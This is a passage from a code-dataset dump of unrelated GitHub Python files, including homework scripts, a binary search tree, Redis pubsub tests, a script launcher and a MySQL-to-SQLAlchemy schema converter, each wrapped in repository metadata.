0, 2*np.pi, lambda pp:0, lambda pp:1,limit = 100)\n# return (1/np.pi)*res\n\n# def gy(r,theta,pi):\n# f = lambda rr , pp : (rr*np.sin(pp)- r*np.cos(theta)*np.sin(pi))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# res, err = dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1,limit = 100)\n# return (1/np.pi)*res\n\n# def gz(r,theta,pi):\n# f = lambda rr , pp : (r*np.sin(theta))/(r**2+rr**2-2*r*rr*np.cos(theta)*np.cos(pp-pi))**(3/2)\n# res, err = dblquad(f, 0, 2*np.pi, lambda pp:0, lambda pp:1, limit = 100)\n# return (1/np.pi)*res\n\n# def g(r,theta,pi):\n# return np.sqrt(gx(r,theta,pi)**2 + gy(r,theta,pi)**2 + gz(r,theta,pi)**2)\n\n# def g0(r):\n# return np.abs(2*(r/((1+r**2)**(1/2))-1))\n\n# print(g(50,0,10))\n# print(g0(50))\n\n\n","repo_name":"kj2063/Astrophysics_Assignments","sub_path":"ScientificComputing_HW4/homework4.py","file_name":"homework4.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22911078918","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef get_g(vals):\n return np.average(np.gradient((vals)))\n\ndata = np.genfromtxt('output')\nxs = data[:, 0]\nys = data[:, 1]\nx_grad = 
get_g(xs)\ny_grad = get_g(ys)\nm_g = np.sqrt(x_grad**2 + y_grad**2)\nprint(\"Gradient: %.4f\" % m_g)\nwidth = int(25)\nplt.plot(xs, ys)\nplt.text(width- 7, 0, \"Gradient: %.4f\" % m_g)\nplt.xlabel(\"Mean x displacment.\")\nplt.ylabel(\"Mean y displacment.\")\nplt.title(\"Glider position changing with time.\")\nplt.show()\n","repo_name":"IainMcl/Modeling-and-Visualisation-in-Physics","sub_path":"Checkpoint 2/Game of Life/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1669388921","text":"import sys\ndef car_type(car):\n '''str -> str'''\n message = ''\n if car == '1' or car.lower() == 'one':\n car_type = 'Bugatti Veyron'\n elif car == '2' or car.lower() == 'two':\n car_type = 'R.R Drophead Phantom Coupe'\n elif car == '3' or car.lower() == 'three':\n car_type = 'Lambo Murcielago'\n elif car == '4' or car.lower() == 'four':\n car_type = 'Ferrari F450'\n elif car == '5' or car.lower() == 'five':\n car_type = 'Lambo Gallardo'\n return car_type \n\n# def r_value(car):\n# '''str -> str'''\n# message = ''\n# if car == '1' or car.lower() == 'one':\n# r_value = '1300000'\n# elif car == '2' or car.lower() == 'two':\n# r_value = '450000'\n# elif car == '3' or car.lower() == 'three':\n# r_value = '250000'\n# elif car == '4' or car.lower() == 'four':\n# r_value = '210000'\n# elif car == '5' or car.lower() == 'five':\n# r_value = '200000'\n# return r_value \n\ndef car_price(car, days):\n '''(str) -> float'''\n if car == '1':\n price = float(days) * 40000\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '2':\n price = float(days) * 3500\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '3':\n price = float(days) * 2250\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price \n elif car == '4':\n price = float(days) * 1675\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n elif car == '5':\n price = float(days) * 1600\n sales_tax = 0.07\n tax = price * sales_tax\n total_price = price + tax\n return total_price\n\n\n","repo_name":"abull2018/rental_store_austinbullard","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34401257896","text":"class BSTNode:\n\t\n def __init__(self, key, val, parent):\n self.NodeKey = key\n self.NodeValue = val\n self.Parent = parent\n self.LeftChild = None\n self.RightChild = None\n\n def setRightChild(self,Node):\n self.RightChild = Node\n\n def setLeftChild(self,Node):\n self.LeftChild = Node\n\n def setParent(self, Node):\n self.Parent = Node\n\n def getLeftChild(self):\n return self.LeftChild\n\n def getRightChild(self):\n return self.RightChild\n\n def getParentNode(self):\n return self.Parent\n\n def isLeftChild(self):\n return self.LeftChild\n\n def isRightChild(self):\n return self.RightChild\n\n def isParent(self):\n return self.Parent\n \n def isEmptyRoot(self):\n return self.Root == None\n \n def isKeysEqual(self,key):\n return self.NodeKey == key\n \n def isNodeKeyLardge(self,key):\n return self.NodeKey > key\n\n\nclass BSTFind:\n\n def __init__(self):\n self.Node = None\n self.NodeHasKey = False\n self.ToLeft = False\n \n def isBSTToLeft(self):\n return self.ToLeft\n\n def 
getBSTNode(self):\n return self.Node\n\n def isNodeHasKey(self):\n return self.NodeHasKey\n\n def setLinkNode(self,Node):\n self.Node = Node\n\n def setNodeHasKey(self,bool = False):\n self.NodeHasKey = bool\n\n def setToLeft(self,bool = False):\n self.ToLeft = bool\n\n\nclass BST:\n\n def __init__(self, node):\n self.Root = node\n\n def getRootNode(self):\n return self.Root\n\n def FindNodeByKey(self, key):\n BSTFindNode = BSTFind()\n if BSTNode.isEmptyRoot(self): return BSTFindNode\n Node = self.getRootNode()\n while Node:\n BSTFindNode.setLinkNode(Node)\n if Node.isKeysEqual(key): \n BSTFindNode.setNodeHasKey(True) \n return BSTFindNode\n if Node.isNodeKeyLardge(key):\n Node = Node.getLeftChild()\n BSTFindNode.setToLeft(True)\n else: \n Node = Node.getRightChild()\n BSTFindNode.setToLeft()\n return BSTFindNode\n\n\n def AddKeyValue(self, key, val):\n resultatFindNode = self.FindNodeByKey(key)\n if resultatFindNode.isNodeHasKey():\n return False\n newNodeInAdd = BSTNode(key,val,resultatFindNode.getBSTNode())\n if resultatFindNode.getBSTNode() == None:\n self.Root = newNodeInAdd\n elif not resultatFindNode.isBSTToLeft():\n resultatFindNode.getBSTNode().setRightChild(newNodeInAdd)\n else:\n resultatFindNode.getBSTNode().setLeftChild(newNodeInAdd)\n return True\n \n def FinMinMax(self, FromNode, FindMax):\n resultatFindNode = FromNode\n if FindMax:\n while resultatFindNode.getRightChild() != None:\n resultatFindNode = resultatFindNode.getRightChild()\n else:\n while resultatFindNode.getLeftChild() != None:\n resultatFindNode = resultatFindNode.getLeftChild()\n if resultatFindNode == FromNode: return None\n return resultatFindNode\n\n\n def ParentLeftChild(self,ReceivingNode,NodeToDelete):\n return (True if ReceivingNode.getLeftChild() == NodeToDelete else False)\n\n def DeleteNodeByKey(self, key):\n NodeToDelete = self.FindNodeByKey(key)\n if not NodeToDelete.isNodeHasKey(): \n return False \n NodeToDelete = NodeToDelete.getBSTNode()\n if not NodeToDelete.getLeftChild() and not NodeToDelete.getRightChild():\n if not NodeToDelete.getParentNode(): self.Root = None\n else:\n ParentNode = NodeToDelete.getParentNode()\n if self.ParentLeftChild(ParentNode,NodeToDelete):\n ParentNode.setLeftChild(None)\n else: ParentNode.setRightChild(None)\n else:\n if NodeToDelete.getLeftChild() and NodeToDelete.getRightChild():\n ReceivingNode = NodeToDelete.RightChild\n if ReceivingNode.getLeftChild():\n ReceivingNode = self.FinMinMax(ReceivingNode,False)\n if ReceivingNode.getRightChild():\n ReceivingNode.getRightChild().setParent(ReceivingNode.getParentNode())\n ReceivingNode.getParentNode().setLeftChild(ReceivingNode.getRightChild())\n else: ReceivingNode.getParentNode().setLeftChild(None)\n ReceivingNode.setRightChild(NodeToDelete.getRightChild())\n NodeToDelete.getRightChild().setParent(ReceivingNode)\n NodeToDelete.getLeftChild().setParent(ReceivingNode)\n ReceivingNode.setLeftChild(NodeToDelete.getLeftChild())\n elif NodeToDelete.getRightChild():\n ReceivingNode = NodeToDelete.getRightChild()\n else: ReceivingNode = NodeToDelete.getLeftChild() \n if NodeToDelete.getParentNode():\n ReceivingNode.setParent(NodeToDelete.getParentNode())\n ParentNode = NodeToDelete.getParentNode()\n if self.ParentLeftChild(ParentNode,NodeToDelete): \n ParentNode.setLeftChild(ReceivingNode)\n else: ParentNode.setRightChild(ReceivingNode)\n else:\n self.Root = ReceivingNode\n ReceivingNode.setParent(None)\n NodeToDelete.setParent(None)\n NodeToDelete.setLeftChild(None)\n NodeToDelete.setRightChild(None)\n return True\n\n def 
Count(self):\n def RecursionNode(Node):\n if Node:\n self.counter += 1\n RecursionNode(Node.LeftChild)\n RecursionNode(Node.RightChild)\n self.counter = 0\n RecursionNode(self.Root)\n return self.counter\n\n def DeepAllNodes(self, parameter):\n ResultatDeepInNodes = []\n\n def PreOrder(Node,ResultatDeepInNodes):\n if Node:\n ResultatDeepInNodes.append(Node)\n PreOrder(Node.getLeftChild(),ResultatDeepInNodes)\n PreOrder(Node.getRightChild(),ResultatDeepInNodes)\n\n def PostOrder(Node,ResultatDeepInNodes):\n if Node:\n PostOrder(Node.getLeftChild(),ResultatDeepInNodes)\n PostOrder(Node.getRightChild(),ResultatDeepInNodes)\n ResultatDeepInNodes.append(Node)\n\n def InOrder(Node,ResultatDeepInNodes):\n if Node:\n InOrder(Node.getLeftChild(),ResultatDeepInNodes)\n ResultatDeepInNodes.append(Node)\n InOrder(Node.getRightChild(),ResultatDeepInNodes)\n \n if parameter == 0: \n InOrder(self.Root,ResultatDeepInNodes)\n elif parameter == 1:\n PostOrder(self.Root,ResultatDeepInNodes)\n else:\n PreOrder(self.Root,ResultatDeepInNodes)\n return tuple(ResultatDeepInNodes)\n\n def WideAllNodes(self):\n Node = self.Root\n if self.Root == None: return None\n ResultatWideInNodes = [Node]\n TempArray = [Node]\n while TempArray:\n NodesLevel = []\n for NodeArray in TempArray:\n if NodeArray.isLeftChild():\n NodesLevel.append(NodeArray.getLeftChild())\n if NodeArray.isRightChild():\n NodesLevel.append(NodeArray.getRightChild())\n [ResultatWideInNodes.append(i) for i in NodesLevel]\n TempArray = NodesLevel\n return tuple(ResultatWideInNodes)\n","repo_name":"SvStranik/trees-graph","sub_path":"TreeTraversalMethods.py","file_name":"TreeTraversalMethods.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41004551444","text":"# 문제는 준원이가 최후의 승자가 되는 것..... 준원이 외 생존자가 있으면 안 됨!!\nn = int(input())\na = list(map(int, input().split()))\n준원 = a[0]\n# 공격력이 낮은 애들부터 공격하도록 정렬하기\na = a[1:]\na.sort()\nfor i in range(n-1):\n # 준원이 이기면 준원이 공격력 상승!\n if a[i] < 준원:\n 준원 += a[i]\n # 준원이 이길 수 없는 상대 혹은 비겨서 생존자가 나타나면 끝\n elif a[i] >= 준원:\n print(\"No\")\n break\nelse:\n print(\"Yes\")","repo_name":"angiekim05/study","sub_path":"Baekjoon/silver/22993.py","file_name":"22993.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8185628871","text":"\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests pubsub functionality.\"\"\"\n\nimport gevent\nimport time\nimport requests\n\nfrom flask import json\nfrom gevent.queue import Queue\nfrom yoapi.urltools import UrlHelper\n\nfrom . 
import BaseTestCase\n\nfrom yoapi.services import redis_pubsub\nfrom yoapi.extensions.pubsub import AlreadyRegisteredError\n\n\nclass PubSubTestCase(BaseTestCase):\n\n counter = 0\n payload = {'Hello': 'World'}\n\n def callback(self, data):\n \"\"\"Callback for pubsub messages\"\"\"\n self.assertEquals(data, self.payload)\n self.counter += 1\n\n def callback_b(self, data):\n \"\"\"Callback for pubsub messages\"\"\"\n self.assertEquals(data, self.payload)\n self.counter += 1\n\n def test_channel(self):\n \"\"\"Test that redis pubsub works\"\"\"\n\n channel = 'test-channel'\n\n with self.app.test_request_context():\n self.become(self._user1)\n # Register the client and start the pubsub manager.\n redis_pubsub.register(self.callback, channel)\n\n # Check that the call counter increments as expected.\n redis_pubsub.publish(self.payload, channel=channel)\n # Allow for context switch so our message gets processed.\n gevent.sleep(0.01)\n self.assertEquals(self.counter, 1)\n\n # Check that the call counter does not increment if we publish to a\n # different channel.\n redis_pubsub.publish(self.payload, channel='other-channel')\n # Allow for context switch so our message gets processed.\n gevent.sleep(0.01)\n self.assertEquals(self.counter, 1)\n\n redis_pubsub.close()\n\n def test_unregister(self):\n\n channel = 'test-channel'\n\n with self.app.test_request_context():\n self.become(self._user1)\n # Test that registered channel is subscribed.\n redis_pubsub.register(self.callback, channel)\n self.assertIn(channel, redis_pubsub.channels)\n\n # Test that registering the same channel and same function raises\n # an error.\n\n self.assertRaises(AlreadyRegisteredError, redis_pubsub.register,\n self.callback, channel)\n\n # Register another listener on the same channel and unregister the\n # first registration.\n redis_pubsub.register(self.callback_b, channel)\n redis_pubsub.unregister(self.callback, channel)\n\n # Assert the channel is still subscribed.\n self.assertIn(channel, redis_pubsub.channels)\n\n # Unsubscribe the second registration and assert that the channel is\n # no longer subscribed.\n redis_pubsub.unregister(self.callback_b, channel)\n redis_pubsub.close()\n","repo_name":"YoApp/yo-api","sub_path":"tests/pubsub_tests.py","file_name":"pubsub_tests.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74852379753","text":"# 简单理解,__init__就是构造函数\nclass Person:\n age = 0\n name = \"Unknown\"\n gender = \"Unknown\"\n\n # def __init__(self) -> None:\n # self.age = 18d\n # self.name = \"Kakyoin\"\n # self.gender = \"male\"\n # 注意,一个类只能有一个构造函数,不能同时有默认构造函数和有参构造函数\n\n def __init__(self, name, age, gender) -> None:\n '这种带下划线的函数是py的内置特殊函数,又叫做魔术方法'\n self.name = name\n self.age = age\n self.gender = gender\n\n def showSelf(self):\n print(\"%s %d %s\" % (self.name, self.age, self.gender))\n\n\nperson1 = Person(\"Kakyoin\", 18, \"Male\")\nperson1.showSelf()\n# person2 = Person()\n# person2.showSelf()\n","repo_name":"529106896/PythonLearning","sub_path":"py-project/07-面向对象1/02-init方法.py","file_name":"02-init方法.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6722104865","text":"\nif __name__ == \"__main__\":\n dist = []\n with open(\"7-dat.txt\") as data:\n points = list(map(int, data.__next__().split(\",\")))\n\n # points = [16, 1, 2, 0, 4, 2, 7, 1, 2, 14]\n\n for i, p1 in 
    for i, p1 in enumerate(range(max(points) + 1)):\n        dist.append([])\n        for p2 in points:\n            # print(p1, p2, abs(p1-p2))\n            dist[i].append(sum(range(abs(p1-p2)+1)))\n        # print(dist[i])\n        # print()\n\n    sum_dist = [sum(d) for d in dist]\n\n    print(min(sum_dist))","repo_name":"MiraiKami/AoC2021","sub_path":"07-12/07-12.py","file_name":"07-12.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25803229726","text":"'''\nCreated on Feb 18, 2014\n\n@author: leal\n'''\n\nfrom launcher import Launcher\n\nimport logging\nimport sys\nimport StringIO\nimport contextlib\nimport os\nfrom multiprocessing import Process, Queue\n\nlogger = logging.getLogger(__name__)\n\n\nclass PythonScriptLauncher(Launcher,Process):\n    '''\n    The python launcher.\n    It uses:\n    globalVariables\n    localVariables\n    to keep the interpreter state between executions.\n\n    The script sent as the command should read the variable:\n    params - input parameters\n    and store its result in the variable:\n    result\n    '''\n\n    def __init__(self, initParams=None):\n        logger.debug(\"Creating Python Script Launcher...\")\n\n        Process.__init__(self)\n        Launcher.__init__(self, initParams)\n\n        self.globalVariables = {}\n        self.localVariables = {}\n\n        self.queueResult = Queue()\n        self.queueOutput = Queue()\n\n        self.result = None\n        self.output = None\n\n        self.timeout = None\n        self.command = None\n\n    @contextlib.contextmanager\n    def _stdoutIO(self,stdout=None):\n        '''\n        Redirects standard output\n        '''\n        old = sys.stdout\n        if stdout is None:\n            stdout = StringIO.StringIO()\n        sys.stdout = stdout\n        yield stdout\n        sys.stdout = old\n\n    def sendCommand(self,command,timeout,inputParams=None):\n        '''\n        Sends a command to the launcher keeping the previous state\n        '''\n        self.timeout = timeout\n        self.command = command\n        self.inputParams = inputParams\n        self._launch()\n\n    def resetAndSendCommand(self,command,timeout,inputParams=None):\n        '''\n        Sends a command to the launcher but resets all the previous state first\n        '''\n        # reset the interpreter state so the new script starts from scratch\n        self.globalVariables = {}\n        self.localVariables = {}\n        self.timeout = timeout\n        self.command = command\n        self.inputParams = inputParams\n        self._launch()\n\n    # private\n    def _launch(self):\n        \"\"\"\n        Blocks the execution!!!!\n        \"\"\"\n        if self.inputParams is not None:\n            logger.debug(\"Old file: \" + self.command)\n            self.command = self.substituteParamsInFile(self.command,self.inputParams,suffix=\".py\",prefix=\"live_\")\n            logger.debug(\"New file: \" + self.command)\n\n        self.start()\n        self.join(self.timeout)\n\n        if self.is_alive():\n            logger.info(\"Thread timed out but the process is still running. 
Killing: %s\" % self.command )\n self.terminate()\n self.join()\n else :\n logger.info(\"Thread finished successfully: %s\"%self.command)\n \n if self.inputParams is not None and self.command.startswith('/tmp'):\n os.remove(self.command)\n self.inputParams = None\n \n # Restart thread to avoid : raise RuntimeError(\"threads can only be started once\")\n #super(PythonScriptLauncher, self).__init__()\n \n \n def run(self):\n '''\n No memory sharing!\n '''\n logger.debug(\"Running in background: %s\" % self.command) \n \n with self._stdoutIO() as s:\n execfile(self.command, self.globalVariables, self.localVariables)\n self.queueOutput.put(s.getvalue())\n \n result = {}\n if self.localVariables.has_key('result') :\n result = self.localVariables['result']\n self.queueResult.put(result)\n \n def readOutput(self):\n return self.queueOutput.get(block=False)\n \n def setInputParameters(self,inputParams):\n '''\n Sets input parameters\n variable params\n '''\n self.localVariables['params'] = inputParams\n \n \n def getResult(self):\n '''\n Get result in form of json\n variable result\n '''\n return self.queueResult.get(block=False)\n \n \n \n ### Non private methods:\n \n \n\n\n ","repo_name":"ricleal/reductionServer","sub_path":"src/query/asynccall/pythonlauncher.py","file_name":"pythonlauncher.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71056358632","text":"import csv\n\n# getting data from CSV\n\nexample_csv_file = open('fruits.csv')\n\nexample_csv_reader = csv.reader(example_csv_file)\nexample_python_data = list(example_csv_reader)\n\nexample_csv_file.close()\n\n\n# writing data to CSV\n\noutput_csv_file = open('fruits2.csv', 'w')\n\noutput_csv_writer = csv.writer(output_csv_file, delimiter='\\t', lineterminator='\\n\\n')\n\nfor row in example_python_data:\n output_csv_writer.writerow(row)\n\noutput_csv_file.close()\n","repo_name":"maciej3031/python_exercises","sub_path":"47_CSV_basic_operations.py","file_name":"47_CSV_basic_operations.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25669851545","text":"#!/usr/bin/python\n# encoding: utf-8\n\"\"\"\nsqlalchemy.py\nFunctions to make SQLAlchemy easier to set up with a MySQL database.\n\nThis module contains very rudimentary conversion functions from MySQL schemas to SQL Alchemy Python classes.\nIt has only been tested on a simple database. It only handles a handful of MySQL types at present and does not create\nunique, foreign, or primary keys in the Python classes. Please feel free to help complete this module but as I will\nonly be adding to it on a need-only basis.\n\nCreated by Shane O'Connor 2014\n\"\"\"\n\nimport sys\nimport string\nimport re\nimport traceback\nimport copy\n\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy import create_engine, and_\nfrom sqlalchemy import inspect as sqlalchemy_inspect\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm.collections import InstrumentedList\n\nif __name__ == '__main__':\n sys.path.insert(0, '..')\nfrom klab import colortext\nfrom .mysql import DatabaseInterface\n\n\n\n# @todo. This module saves time creating SQLAlchemy class definitions. 
It is still very basic however (and hacked together).\n# The next improvement should be to handle foreign key constraint definitions e.g. turn\n# CONSTRAINT `PDBResidue_ibfk_1` FOREIGN KEY (`PDBFileID`, `Chain`) REFERENCES `PDBChain` (`PDBFileID`, `Chain`)\n# into\n# PDBFileID = Column(..., ForeignKey('PDBChain.PDBFileID'))\n# Depending on the schema, a field may be involved in multiple foreign key constraints.\n# It may make more sense to use relationships here instead e.g.\n# pdb_chain = relationship(\"PDBChain\", foreign_keys=[PDBFileID, Chain])\n# but I need to read the documentation.\n\n\ndef row_to_dict(r, keep_relationships = False):\n '''Converts an SQLAlchemy record to a Python dict. We assume that _sa_instance_state exists and is the only value we do not care about.\n If DeclarativeBase is passed then all DeclarativeBase objects (e.g. those created by relationships) are also removed.\n '''\n d = {}\n if not keep_relationships:\n # only returns the table columns\n t = r.__table__\n for c in [c.name for c in list(sqlalchemy_inspect(t).columns)]:\n d[c] = getattr(r, c)\n return d\n else:\n # keeps all objects including those of type DeclarativeBase or InstrumentedList and the _sa_instance_state object\n return copy.deepcopy(r.__dict__)\n\n\ndef get_single_record_from_query(result_set):\n '''A helper function to return the single result from a query. This is a variation of SQLAlchemy's .one()\n function. We assume that either a result does not exist or exactly one exists (one() assumes that exactly one exists).\n Returns None in the former case and the result in the latter case.\n '''\n assert(result_set.count() <= 1)\n if result_set.count() == 1:\n return result_set[0]\n\n\ndef get_or_create_in_transaction(tsession, model, values, missing_columns = [], variable_columns = [], updatable_columns = [], only_use_supplied_columns = False, read_only = False):\n '''\n Uses the SQLAlchemy model to retrieve an existing record based on the supplied field values or, if there is no\n existing record, to create a new database record.\n\n :param tsession: An SQLAlchemy transactioned session\n :param model: The name of the SQLAlchemy class representing the table\n :param values: A dict of values which will be used to populate the fields of the model\n :param missing_columns: Elements of missing_columns are expected to be fields in the model but are left blank regardless of whether they exist in values. This is useful for auto_increment fields.\n :param updatable_columns: If these are specified, they are treated as missing columns in the record matching and if a record is found, these fields will be updated\n :param variable_columns: If these are specified, they are treated as missing columns in the record matching but are not updated. A good use of these are for datetime fields which default to the current datetime\n :param read_only: If this is set then we query the database and return an instance if one exists but we do not create a new record.\n :return:\n\n Note: This function is a convenience function and is NOT efficient. The \"tsession.query(model).filter_by(**pruned_values)\"\n call is only (sometimes) efficient if an index exists on the keys of pruned_values. If any of the fields of pruned_values are\n large (even if otherwise deferred/loaded lazily) then you will incur a performance hit on lookup. 
You may need\n to reconsider any calls to this function in inner loops of your code.'''\n\n\n values = copy.deepcopy(values) # todo: this does not seem to be necessary since we do not seem to be writing\n\n fieldnames = [c.name for c in list(sqlalchemy_inspect(model).columns)]\n for c in missing_columns:\n fieldnames.remove(c)\n for c in updatable_columns:\n fieldnames.remove(c)\n for c in variable_columns:\n if c in fieldnames:\n fieldnames.remove(c)\n\n if only_use_supplied_columns:\n fieldnames = sorted(set(fieldnames).intersection(set(values.keys())))\n else:\n unexpected_fields = set(values.keys()).difference(set(fieldnames)).difference(set(variable_columns)).difference(set(updatable_columns))\n if unexpected_fields:\n raise Exception(\"The fields '{0}' were passed but not found in the schema for table {1}.\".format(\"', '\".join(sorted(unexpected_fields)), model.__dict__['__tablename__']))\n\n pruned_values = {}\n for k in set(values.keys()).intersection(set(fieldnames)):\n v = values[k]\n pruned_values[k] = v\n\n instance = tsession.query(model).filter_by(**pruned_values)\n if instance.count() > 1:\n raise Exception('Multiple records were found with the search criteria.')\n instance = instance.first()\n\n if instance:\n if read_only == False:\n for c in updatable_columns:\n setattr(instance, c, values[c])\n tsession.flush()\n return instance\n else:\n if read_only == False:\n if sorted(pruned_values.keys()) != sorted(fieldnames):\n # When adding new records, we require that all necessary fields are present\n raise Exception('Some required fields are missing: {0}. Either supply these fields or add them to the missing_columns list.'.format(set(fieldnames).difference(list(pruned_values.keys()))))\n instance = model(**pruned_values)\n tsession.add(instance)\n tsession.flush()\n return instance\n return None\n\n\ndef get_or_create_in_transaction_wrapper(tsession, model, values, missing_columns = [], variable_columns = [], updatable_columns = [], only_use_supplied_columns = False, read_only = False):\n '''This function can be used to determine which calling method is spending time in get_or_create_in_transaction when profiling the database API.\n Switch out calls to get_or_create_in_transaction to get_or_create_in_transaction_wrapper in the suspected functions to determine where the pain lies.'''\n return get_or_create_in_transaction(tsession, model, values, missing_columns = missing_columns, variable_columns = variable_columns, updatable_columns = updatable_columns, only_use_supplied_columns = only_use_supplied_columns, read_only = read_only)\n\n\nclass IntermediateField(object):\n\n\n def __init__(self, field_name, field_type, not_null = False, default_type = None, default_value = None, comment = None, is_primary_key = False, unicode_collation_or_character_set = False):\n self.field_name = field_name\n self.field_type = field_type\n self.not_null = not_null\n self.default_type = default_type\n self.default_value = default_value\n self.comment = comment\n self.is_primary_key = is_primary_key\n self.unicode_collation_or_character_set = unicode_collation_or_character_set\n\n\n def to_sql_alchemy(self, typedefs):\n s = ''\n s += self.field_name + ' = Column('\n\n is_string_type = None\n is_numeric_type = None\n\n if self.field_type.startswith('varchar'):\n mtchs = re.match(\"varchar[(](\\d+)[)]\", self.field_type)\n assert(mtchs)\n length = int(mtchs.group(1))\n is_string_type = True\n if self.unicode_collation_or_character_set:\n s += 'Unicode(%d)' % length\n 
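# utf-collated columns are emitted as SQLAlchemy Unicode; the non-utf branch below falls back to String.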
typedefs['sqlalchemy.types'].add('Unicode')\n else:\n typedefs['sqlalchemy.types'].add('String')\n s += 'String(%d)' % length\n\n elif self.field_type == 'double':\n s += 'DOUBLE'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('DOUBLE')\n\n elif self.field_type == 'float':\n s += 'Float'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Float')\n\n elif self.field_type == 'longtext' or self.field_type == 'text' or self.field_type == 'mediumtext':\n s += 'Text'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Text')\n\n elif self.field_type == 'date' or self.field_type == 'datetime':\n s += 'DateTime'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('DateTime')\n\n elif self.field_type == 'timestamp':\n s += 'TIMESTAMP'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('TIMESTAMP')\n\n elif self.field_type.startswith('enum('):\n s += self.field_type.replace('enum', 'Enum')\n is_string_type = True\n typedefs['sqlalchemy.types'].add('Enum')\n\n elif self.field_type.startswith('int(') or self.field_type.startswith('bigint('):\n s += 'Integer'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Integer')\n\n elif self.field_type.startswith('tinyint('):\n s += self.field_type.upper()\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('TINYINT')\n\n elif self.field_type == 'blob':\n s += 'BLOB'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('BLOB')\n\n elif self.field_type == 'longblob':\n s += 'LONGBLOB'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('LONGBLOB')\n\n else:\n raise Exception(\"Unhandled type: '%s'\" % self.field_type)\n\n if self.not_null:\n s += ', nullable=False'\n else:\n s += ', nullable=True'\n\n if self.is_primary_key:\n s += ', primary_key=True'\n\n if self.default_type != None:\n if self.default_type == 'string':\n if is_string_type:\n s += \", default=u'%s'\" % self.default_value\n elif is_numeric_type:\n s += \", default=%s\" % self.default_value\n else:\n assert(0)\n\n s += ')'\n return s\n\n\nclass MySQLSchemaConverter(object):\n\n def __init__(self, user, host, db, passwd, port = 3306, socket = '/var/lib/mysql/mysql.sock'):\n try:\n self.db_interface = DatabaseInterface({}, isInnoDB=True, numTries=1, host=host, db=db, user=user, passwd=passwd, port=3306,\n unix_socket=socket, passwdfile=None, use_utf=False, use_locking=True)\n except Exception as e:\n colortext.error('An exception was thrown trying to connect to the database.')\n colortext.warning(str(e))\n print((traceback.format_exc()))\n sys.exit(1)\n\n self.intermediate_schema = {}\n self.tables = self.db_interface.TableNames\n self._parse_schema()\n\n\n def _parse_schema(self):\n for tbl in self.tables:\n self._create_intermediate_schema(tbl)\n\n\n def get_sqlalchemy_schema(self, restrict_to_tables = []):\n colortext.warning(' *** MySQL schema ***')\n schema = []\n #print(self.intermediate_schema)\n\n typedefs = {'sqlalchemy.types' : set(), 'sqlalchemy.dialects.mysql' : set()}\n\n for tbl in self.tables:\n if (not restrict_to_tables) or (tbl in restrict_to_tables):\n colortext.message(tbl)\n\n print((self.db_interface.execute(\"SHOW CREATE TABLE %s\" % tbl))[0]['Create Table'])\n print('')\n code = []\n code.append(\"class %s(DeclarativeBase):\" % tbl)\n code.append(\" __tablename__ = '%s'\\n\" % tbl)\n #print('\\n'.join(code))\n\n intermediate_table = self.intermediate_schema[tbl]\n for field in intermediate_table:\n s = field.to_sql_alchemy(typedefs)\n code.append(' 
